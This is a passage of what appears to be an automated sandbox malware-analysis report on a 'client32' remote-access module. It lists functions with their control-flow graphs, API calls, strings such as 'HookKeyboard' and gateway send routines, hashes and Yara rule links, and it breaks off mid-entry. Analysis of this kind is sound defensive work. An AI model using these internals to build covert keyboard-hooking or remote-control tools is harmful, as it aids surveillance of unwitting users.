                                                                                                • Instruction Fuzzy Hash: B1C1EF75E4127A9BEB22CF918C94FEDF7B9BB48308F8044E9E559A7240D6706E80CB51
                                                                                                Function 69CE63C0 Relevance: 49.2, APIs: 24, Strings: 4, Instructions: 181libraryloadersleepCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2777 69ce63c0-69ce6402 call 69d04710 EnterCriticalSection InterlockedDecrement 2780 69ce65ed-69ce6608 LeaveCriticalSection call 69d028e1 2777->2780 2781 69ce6408-69ce641f EnterCriticalSection 2777->2781 2783 69ce64da-69ce64e0 2781->2783 2784 69ce6425-69ce6431 2781->2784 2788 69ce65bd-69ce65e8 call 69d01c50 LeaveCriticalSection 2783->2788 2789 69ce64e6-69ce64f0 shutdown 2783->2789 2786 69ce6443-69ce6447 2784->2786 2787 69ce6433-69ce6441 GetProcAddress 2784->2787 2791 69ce644e-69ce6450 SetLastError 2786->2791 2792 69ce6449-69ce644c 2786->2792 2787->2786 2788->2780 2793 69ce650a-69ce652d timeGetTime #16 2789->2793 2794 69ce64f2-69ce6507 GetLastError call 69ce30a0 2789->2794 2799 69ce6456-69ce6465 2791->2799 2792->2799 2796 69ce652f 2793->2796 2797 69ce656c-69ce656e 2793->2797 2794->2793 2803 69ce6551-69ce656a #16 2796->2803 2804 69ce6531 2796->2804 2805 69ce6570-69ce657b closesocket 2797->2805 2800 69ce6477-69ce647b 2799->2800 2801 69ce6467-69ce6475 GetProcAddress 2799->2801 2807 69ce647d-69ce6480 2800->2807 2808 69ce6482-69ce6484 SetLastError 2800->2808 2801->2800 2803->2796 2803->2797 2804->2803 2809 69ce6533-69ce653e GetLastError 2804->2809 2810 69ce657d-69ce658a WSAGetLastError 2805->2810 2811 69ce65b6 2805->2811 2812 69ce648a-69ce6499 2807->2812 2808->2812 2809->2797 2813 69ce6540-69ce6547 timeGetTime 2809->2813 2814 69ce658c-69ce658e Sleep 2810->2814 2815 69ce6594-69ce6598 2810->2815 2811->2788 2817 69ce64ab-69ce64af 2812->2817 2818 69ce649b-69ce64a9 GetProcAddress 2812->2818 2813->2797 2819 69ce6549-69ce654b Sleep 2813->2819 2814->2815 2815->2805 2820 69ce659a-69ce659c 2815->2820 2821 69ce64c3-69ce64d5 SetLastError 2817->2821 2822 69ce64b1-69ce64be 2817->2822 2818->2817 2819->2803 2820->2811 2823 69ce659e-69ce65b3 GetLastError call 69ce30a0 2820->2823 2821->2788 2822->2788 2823->2811
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,00000000,?,00000000,?,69CED77B,00000000), ref: 69CE63E8
                                                                                                • InterlockedDecrement.KERNEL32(-0003F3B7,?,00000000,?,69CED77B,00000000), ref: 69CE63FA
                                                                                                • EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,69CED77B,00000000), ref: 69CE6412
                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle,?,00000000,?,69CED77B,00000000), ref: 69CE643B
                                                                                                • SetLastError.KERNEL32(00000078,?,00000000,?,69CED77B,00000000), ref: 69CE6450
                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle,?,00000000,?,69CED77B,00000000), ref: 69CE646F
                                                                                                • SetLastError.KERNEL32(00000078,?,00000000,?,69CED77B,00000000), ref: 69CE6484
                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle,?,00000000,?,69CED77B,00000000), ref: 69CE64A3
                                                                                                • SetLastError.KERNEL32(00000078,?,00000000,?,69CED77B,00000000), ref: 69CE64C5
                                                                                                • shutdown.WSOCK32(?,00000001), ref: 69CE64E9
                                                                                                • GetLastError.KERNEL32(?,00000000,?,69CED77B,00000000), ref: 69CE64F2
                                                                                                • timeGetTime.WINMM ref: 69CE6510
                                                                                                • #16.WSOCK32(?,?,00001000,00000000,?,00000000,?,69CED77B,00000000), ref: 69CE6526
                                                                                                • GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,69CED77B,00000000), ref: 69CE6533
                                                                                                • timeGetTime.WINMM ref: 69CE6540
                                                                                                • Sleep.KERNEL32(00000001,?,00000000,?,69CED77B,00000000), ref: 69CE654B
                                                                                                • #16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,69CED77B,00000000), ref: 69CE6563
                                                                                                • closesocket.WSOCK32(?), ref: 69CE6574
                                                                                                • WSAGetLastError.WSOCK32(?,?,00001000,00000000,?,00000000,?,69CED77B,00000000), ref: 69CE657D
                                                                                                • Sleep.KERNEL32(00000032,?,?,00001000,00000000,?,00000000,?,69CED77B,00000000), ref: 69CE658E
                                                                                                • GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,69CED77B,00000000), ref: 69CE659E
                                                                                                • _memset.LIBCMT ref: 69CE65C8
                                                                                                • LeaveCriticalSection.KERNEL32(?,?,69CED77B,00000000), ref: 69CE65D7
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,00000000,?,69CED77B,00000000), ref: 69CE65F2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlocked_memsetclosesocketshutdown
                                                                                                • String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle$&}s
                                                                                                • API String ID: 3764039262-698344514
                                                                                                • Opcode ID: 437844b5a82e832fac51456230874848c9b60f18562f28c0d02fcf6bdf2bb202
                                                                                                • Instruction ID: a2410a7062639e1f884a888a068aa7613d4b02764d58a4e18fd11cc7eac53e11
                                                                                                • Opcode Fuzzy Hash: 437844b5a82e832fac51456230874848c9b60f18562f28c0d02fcf6bdf2bb202
                                                                                                • Instruction Fuzzy Hash: CA51B0756447409FEB10DF68DA98B5A73B9BF89354F108174EB0AD7680EBB0E884CB61
                                                                                                Function 69CE98D0 Relevance: 47.6, APIs: 15, Strings: 12, Instructions: 346COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2827 69ce98d0-69ce9932 2828 69ce9956-69ce995e 2827->2828 2829 69ce9934-69ce9955 call 69ce30a0 call 69d028e1 2827->2829 2831 69ce9964-69ce9979 call 69d028f0 2828->2831 2832 69ce9ac5-69ce9acc 2828->2832 2831->2832 2848 69ce997f-69ce9994 call 69d04330 2831->2848 2833 69ce9ace-69ce9adb 2832->2833 2834 69ce9b19-69ce9b1d 2832->2834 2837 69ce9add-69ce9af6 wsprintfA 2833->2837 2838 69ce9af8-69ce9b07 wsprintfA 2833->2838 2839 69ce9b1f-69ce9b26 2834->2839 2840 69ce9b4b-69ce9b70 GetTickCount InterlockedExchange EnterCriticalSection 2834->2840 2843 69ce9b0a-69ce9b16 call 69ce52b0 2837->2843 2838->2843 2839->2840 2844 69ce9b28-69ce9b41 call 69ce77b0 2839->2844 2846 69ce9b9c-69ce9ba1 2840->2846 2847 69ce9b72-69ce9b9b LeaveCriticalSection call 69ce30a0 call 69d028e1 2840->2847 2843->2834 2844->2840 2868 69ce9b43-69ce9b45 2844->2868 2850 69ce9bfb-69ce9c05 2846->2850 2851 69ce9ba3-69ce9bd0 call 69ce4dd0 2846->2851 2848->2832 2863 69ce999a-69ce99af call 69d028f0 2848->2863 2859 69ce9c3b-69ce9c47 2850->2859 2860 69ce9c07-69ce9c17 2850->2860 2873 69ce9d4b-69ce9d6c LeaveCriticalSection call 69cf77e0 2851->2873 2874 69ce9bd6-69ce9bf6 WSAGetLastError call 69ce30a0 2851->2874 2864 69ce9c50-69ce9c5a 2859->2864 2866 69ce9c19-69ce9c1d 2860->2866 2867 69ce9c20-69ce9c22 2860->2867 2863->2832 2885 69ce99b5-69ce99f1 2863->2885 2871 69ce9d2e-69ce9d3b call 69ce30a0 2864->2871 2872 69ce9c60-69ce9c65 2864->2872 2866->2867 2875 69ce9c1f 2866->2875 2867->2859 2876 69ce9c24-69ce9c36 call 69ce46c0 2867->2876 2868->2840 2890 69ce9d45 2871->2890 2880 69ce9c67-69ce9c6b 2872->2880 2881 69ce9c71-69ce9c9a send 2872->2881 2894 69ce9d6e-69ce9d72 InterlockedIncrement 2873->2894 2895 69ce9d78-69ce9d8a call 69d028e1 2873->2895 2874->2873 2875->2867 2876->2859 2880->2871 2880->2881 2886 69ce9c9c-69ce9c9f 2881->2886 2887 69ce9cf1-69ce9d0f call 69ce30a0 2881->2887 2891 69ce99f7-69ce99ff 2885->2891 2892 69ce9cbe-69ce9cce WSAGetLastError 2886->2892 2893 69ce9ca1-69ce9cac 2886->2893 2887->2890 2890->2873 2897 69ce9a05-69ce9a08 2891->2897 2898 69ce9aa3-69ce9ac2 call 69ce30a0 2891->2898 2900 69ce9cd0-69ce9ce9 timeGetTime Sleep 2892->2900 2901 69ce9d11-69ce9d2c call 69ce30a0 2892->2901 2893->2890 2899 69ce9cb2-69ce9cbc 2893->2899 2894->2895 2905 69ce9a0e 2897->2905 2906 69ce9a0a-69ce9a0c 2897->2906 2898->2832 2899->2900 2900->2864 2907 69ce9cef 2900->2907 2901->2890 2911 69ce9a14-69ce9a1d 2905->2911 2906->2911 2907->2890 2913 69ce9a1f-69ce9a22 2911->2913 2914 69ce9a8d-69ce9a8e 2911->2914 2915 69ce9a26-69ce9a35 2913->2915 2916 69ce9a24 2913->2916 2914->2898 2917 69ce9a37-69ce9a3a 2915->2917 2918 69ce9a90-69ce9a93 2915->2918 2916->2915 2920 69ce9a3e-69ce9a4d 2917->2920 2921 69ce9a3c 2917->2921 2919 69ce9a9d 2918->2919 2919->2898 2922 69ce9a4f-69ce9a52 2920->2922 2923 69ce9a95-69ce9a98 2920->2923 2921->2920 2924 69ce9a56-69ce9a65 2922->2924 2925 69ce9a54 2922->2925 2923->2919 2926 69ce9a9a 2924->2926 2927 69ce9a67-69ce9a6a 2924->2927 2925->2924 2926->2919 2928 69ce9a6e-69ce9a85 2927->2928 2929 69ce9a6c 2927->2929 2928->2891 2930 69ce9a8b 2928->2930 2929->2928 2930->2898
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _strncmp
                                                                                                • String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x$&}s
                                                                                                • API String ID: 909875538-151058507
                                                                                                • Opcode ID: 3d2e9e399bbeacdc42a5a26cc43f4c806ad0259707baa09ae3067e768f9ecb7e
                                                                                                • Instruction ID: afe79a20291aa75b99b48bc3005cd5620b72a925e9246017de5bfbd5f0f42067
                                                                                                • Opcode Fuzzy Hash: 3d2e9e399bbeacdc42a5a26cc43f4c806ad0259707baa09ae3067e768f9ecb7e
                                                                                                • Instruction Fuzzy Hash: 16D1E575A042159FEB20CF64EC95BDDB7B5BF0A308F0480E9D90E9B241E7319A89CF51
                                                                                                Function 11142010 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 266libraryregistryloaderCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2931 11142010-11142051 call 11147060 2934 11142057-111420b3 LoadLibraryA 2931->2934 2935 111420d9-11142103 call 11143a50 call 11147af0 LoadLibraryA 2931->2935 2936 111420b5 call 11017a40 2934->2936 2937 111420c7-111420d0 2934->2937 2947 11142105-1114210b 2935->2947 2948 11142133 2935->2948 2942 111420ba-111420c0 2936->2942 2937->2935 2940 111420d2-111420d3 FreeLibrary 2937->2940 2940->2935 2942->2937 2944 111420c2 call 110ccc90 2942->2944 2944->2937 2947->2948 2950 1114210d-11142113 2947->2950 2949 1114213d-1114215d GetClassInfoExA 2948->2949 2951 11142163-1114218a call 11162be0 call 11145080 2949->2951 2952 111421fe-11142256 2949->2952 2950->2948 2953 11142115-11142131 call 1105e820 2950->2953 2962 111421a3-111421e5 call 11145080 call 111450b0 LoadCursorA GetStockObject RegisterClassExA 2951->2962 2963 1114218c-111421a0 call 11029a70 2951->2963 2964 11142292-11142298 2952->2964 2965 11142258-1114225e 2952->2965 2953->2949 2962->2952 2986 111421e7-111421fb call 11029a70 2962->2986 2963->2962 2969 111422d4-111422f6 call 1105e820 2964->2969 2970 1114229a-111422a9 call 111101b0 2964->2970 2965->2964 2967 11142260-11142266 2965->2967 2967->2964 2974 11142268-1114227f call 1112d770 LoadLibraryA 2967->2974 2982 11142304-11142309 2969->2982 2983 111422f8-11142302 2969->2983 2980 111422cd 2970->2980 2981 111422ab-111422cb 2970->2981 2974->2964 2990 11142281-1114228d GetProcAddress 2974->2990 2987 111422cf 2980->2987 2981->2987 2988 11142315-1114231b 2982->2988 2989 1114230b 2982->2989 2983->2988 2986->2952 2987->2969 2992 1114231d-11142323 call 110f8230 2988->2992 2993 11142328-11142341 call 1113d9a0 2988->2993 2989->2988 2990->2964 2992->2993 2999 11142347-1114234d 2993->2999 3000 111423e9-111423fa 2993->3000 3001 1114234f-11142361 call 111101b0 2999->3001 3002 11142389-1114238f 2999->3002 3012 11142363-11142379 call 1115e590 3001->3012 3013 1114237b 3001->3013 3004 111423b5-111423c1 3002->3004 3005 11142391-11142397 3002->3005 3006 111423c3-111423c9 3004->3006 3007 111423d8-111423e3 #17 LoadLibraryA 3004->3007 3009 1114239e-111423b0 SetTimer 3005->3009 3010 11142399 call 11135840 3005->3010 3006->3007 3011 111423cb-111423d1 3006->3011 3007->3000 3009->3004 3010->3009 3011->3007 3015 111423d3 call 1112e5e0 3011->3015 3017 1114237d-11142384 3012->3017 3013->3017 3015->3007 3017->3002
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(User32.dll), ref: 11142063
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 111420D3
                                                                                                • LoadLibraryA.KERNEL32(imm32), ref: 111420F6
                                                                                                • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 11142155
                                                                                                • _memset.LIBCMT ref: 11142169
                                                                                                • LoadCursorA.USER32(00000000,00007F00,?,?,?,?,?,00000000,?), ref: 111421B9
                                                                                                • GetStockObject.GDI32(00000000), ref: 111421C3
                                                                                                • RegisterClassExA.USER32 ref: 111421DA
                                                                                                • LoadLibraryA.KERNEL32(pcihooks), ref: 11142272
                                                                                                • GetProcAddress.KERNEL32(00000000,HookKeyboard,?,?,00000000,?), ref: 11142287
                                                                                                • SetTimer.USER32(00000000,00000000,000003E8,1113D980), ref: 111423AA
                                                                                                • #17.COMCTL32(?,?,?,00000000,?), ref: 111423D8
                                                                                                • LoadLibraryA.KERNEL32(riched32.dll), ref: 111423E3
                                                                                                  • Part of subcall function 11017A40: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,986DAFD2,11030346,00000000), ref: 11017A6E
                                                                                                  • Part of subcall function 11017A40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 11017A7E
                                                                                                  • Part of subcall function 11017A40: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 11017AC2
                                                                                                  • Part of subcall function 11017A40: QueueUserWorkItem.KERNEL32(110179E0,00000000,00000010), ref: 11017AD7
                                                                                                  • Part of subcall function 11017A40: FreeLibrary.KERNEL32(00000000), ref: 11017AE8
                                                                                                  • Part of subcall function 110CCC90: CreateWindowExA.USER32 ref: 110CCCC9
                                                                                                  • Part of subcall function 110CCC90: SetClassLongA.USER32(00000000,000000E8,110CCA10), ref: 110CCCE0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoItemLongObjectQueueRegisterStockTimerUserWindowWork_memset
                                                                                                • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                                • API String ID: 3910702804-3145203681
                                                                                                • Opcode ID: 6162cea6d52b3f6b582c254ed48a2b5625011915d4fa4a951ecf12eebf0848c9
                                                                                                • Instruction ID: dd3f645cf5ef2db3b7f5f54c26e54504db449fd0c20b07bc67f1527c65be20eb
                                                                                                • Opcode Fuzzy Hash: 6162cea6d52b3f6b582c254ed48a2b5625011915d4fa4a951ecf12eebf0848c9
                                                                                                • Instruction Fuzzy Hash: F8A18CB8E02266DFDB01DFE5D9C4AA9FBB4BB0870CF60453EE125A7648E7305484CB55
                                                                                                Function 11028C10 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542COMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 3020 11028c10-11028c2d 3021 11028c33-11028c62 3020->3021 3022 110292f8-110292ff 3020->3022 3023 11028cf0-11028d38 GetModuleFileNameA call 111640b0 call 11164ead 3021->3023 3024 11028c68-11028c6e 3021->3024 3025 11029311-11029315 3022->3025 3026 11029301-1102930a 3022->3026 3040 11028d3d 3023->3040 3028 11028c70-11028c78 3024->3028 3030 11029317-11029329 call 11162bb7 3025->3030 3031 1102932a-1102933e call 11162bb7 3025->3031 3026->3025 3029 1102930c 3026->3029 3028->3028 3033 11028c7a-11028c80 3028->3033 3029->3025 3038 11028c83-11028c88 3033->3038 3038->3038 3041 11028c8a-11028c94 3038->3041 3042 11028d40-11028d4a 3040->3042 3043 11028cb1-11028cb7 3041->3043 3044 11028c96-11028c9d 3041->3044 3045 11028d50-11028d53 3042->3045 3046 110292ef-110292f7 3042->3046 3048 11028cb8-11028cbe 3043->3048 3047 11028ca0-11028ca6 3044->3047 3045->3046 3049 11028d59-11028d67 call 11026ef0 3045->3049 3046->3022 3047->3047 3050 11028ca8-11028cae 3047->3050 3048->3048 3051 11028cc0-11028cee call 11164ead 3048->3051 3056 11029275-1102928a call 11164c77 3049->3056 3057 11028d6d-11028d80 call 11163ca7 3049->3057 3050->3043 3051->3042 3056->3046 3062 11029290-110292ea 3056->3062 3063 11028d82-11028d85 3057->3063 3064 11028d8b-11028db3 call 11026d60 call 11026ef0 3057->3064 3062->3046 3063->3056 3063->3064 3064->3056 3069 11028db9-11028dd6 call 11026fe0 call 11026ef0 3064->3069 3074 110291e5-110291ec 3069->3074 3075 11028ddc 3069->3075 3076 11029212-11029219 3074->3076 3077 110291ee-110291f1 3074->3077 3078 11028de0-11028e00 call 11026d60 3075->3078 3080 11029231-11029238 3076->3080 3081 1102921b-11029221 3076->3081 3077->3076 3079 110291f3-110291fa 3077->3079 3090 11028e02-11028e05 3078->3090 3091 11028e36-11028e39 3078->3091 3083 11029200-11029210 3079->3083 3085 1102923a-11029245 3080->3085 3086 11029248-1102924f 3080->3086 3084 11029227-1102922f 3081->3084 3083->3076 3083->3083 3084->3080 3084->3084 3085->3086 3088 11029251-1102925b 3086->3088 3089 1102925e-11029265 3086->3089 3088->3089 3089->3056 3092 11029267-11029272 3089->3092 3095 11028e07-11028e0e 3090->3095 3096 11028e1e-11028e21 3090->3096 3093 110291ce-110291df call 11026ef0 3091->3093 3094 11028e3f-11028e52 call 11165010 3091->3094 3092->3056 3093->3074 3093->3078 3094->3093 3103 11028e58-11028e74 call 1116558e 3094->3103 3097 11028e14-11028e1c 3095->3097 3096->3093 3099 11028e27-11028e31 3096->3099 3097->3096 3097->3097 3099->3093 3106 11028e76-11028e7c 3103->3106 3107 11028e8f-11028ea5 call 1116558e 3103->3107 3108 11028e80-11028e88 3106->3108 3112 11028ea7-11028ead 3107->3112 3113 11028ebf-11028ed5 call 1116558e 3107->3113 3108->3108 3110 11028e8a 3108->3110 3110->3093 3114 11028eb0-11028eb8 3112->3114 3118 11028ed7-11028edd 3113->3118 3119 11028eef-11028f05 call 1116558e 3113->3119 3114->3114 3116 11028eba 3114->3116 3116->3093 3120 11028ee0-11028ee8 3118->3120 3124 11028f07-11028f0d 3119->3124 3125 11028f1f-11028f35 call 1116558e 3119->3125 3120->3120 3122 11028eea 3120->3122 3122->3093 3127 11028f10-11028f18 3124->3127 3130 11028f37-11028f3d 3125->3130 3131 11028f4f-11028f65 call 1116558e 3125->3131 3127->3127 3129 11028f1a 3127->3129 3129->3093 3132 11028f40-11028f48 3130->3132 3136 11028f67-11028f6d 3131->3136 3137 11028f7f-11028f95 call 1116558e 3131->3137 3132->3132 3134 11028f4a 3132->3134 3134->3093 3138 11028f70-11028f78 3136->3138 3142 11028f97-11028f9d 3137->3142 3143 11028faf-11028fc5 call 1116558e 3137->3143 3138->3138 3140 11028f7a 3138->3140 3140->3093 3145 11028fa0-11028fa8 3142->3145 3148 11028fc7-11028fcd 3143->3148 3149 11028fdf-11028ff5 call 1116558e 3143->3149 3145->3145 3146 11028faa 3145->3146 3146->3093 3150 11028fd0-11028fd8 3148->3150 3154 11028ff7-11028ffd 3149->3154 3155 1102900f-11029025 call 1116558e 3149->3155 3150->3150 3152 11028fda 3150->3152 3152->3093 3156 11029000-11029008 3154->3156 3160 11029027-1102902d 3155->3160 3161 1102903f-11029055 call 1116558e 3155->3161 3156->3156 3158 1102900a 3156->3158 3158->3093 3162 11029030-11029038 3160->3162 3166 11029057-1102905d 3161->3166 3167 1102906f-11029085 call 1116558e 3161->3167 3162->3162 3164 1102903a 3162->3164 3164->3093 3168 11029060-11029068 3166->3168 3172 110290a6-110290bc call 1116558e 3167->3172 3173 11029087-1102908d 3167->3173 3168->3168 3170 1102906a 3168->3170 3170->3093 3178 110290d3-110290e9 call 1116558e 3172->3178 3179 110290be 3172->3179 3175 11029097-1102909f 3173->3175 3175->3175 3177 110290a1 3175->3177 3177->3093 3184 11029100-11029116 call 1116558e 3178->3184 3185 110290eb 3178->3185 3180 110290c4-110290cc 3179->3180 3180->3180 3182 110290ce 3180->3182 3182->3093 3190 11029137-1102914d call 1116558e 3184->3190 3191 11029118-1102911e 3184->3191 3186 110290f1-110290f9 3185->3186 3186->3186 3188 110290fb 3186->3188 3188->3093 3196 1102916f-11029185 call 1116558e 3190->3196 3197 1102914f-1102915f 3190->3197 3193 11029128-11029130 3191->3193 3193->3193 3194 11029132 3193->3194 3194->3093 3202 11029187-1102918d 3196->3202 3203 1102919c-110291b2 call 1116558e 3196->3203 3198 11029160-11029168 3197->3198 3198->3198 3200 1102916a 3198->3200 3200->3093 3204 11029190-11029198 3202->3204 3203->3093 3208 110291b4-110291ba 3203->3208 3204->3204 3206 1102919a 3204->3206 3206->3093 3209 110291c4-110291cc 3208->3209 3209->3093 3209->3209
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,73631528,?,0000001A), ref: 11028CFD
                                                                                                • _strrchr.LIBCMT ref: 11028D0C
                                                                                                  • Part of subcall function 1116558E: __stricmp_l.LIBCMT ref: 111655CB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileModuleName__stricmp_l_strrchr
                                                                                                • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                                • API String ID: 1609618855-357498123
                                                                                                • Opcode ID: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                                                • Instruction ID: 6dd15402a7eb79c0789e25bc58f14fe58cbd6334f89e1d0f8744b7b944579b3b
                                                                                                • Opcode Fuzzy Hash: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                                                • Instruction Fuzzy Hash: 86120738D052A68FDB16CF64CC84BE8B7F4AB1634CF5000EED9D597601EB72568ACB52
                                                                                                Function 69CF6BA0 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 273sleepsynchronizationCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
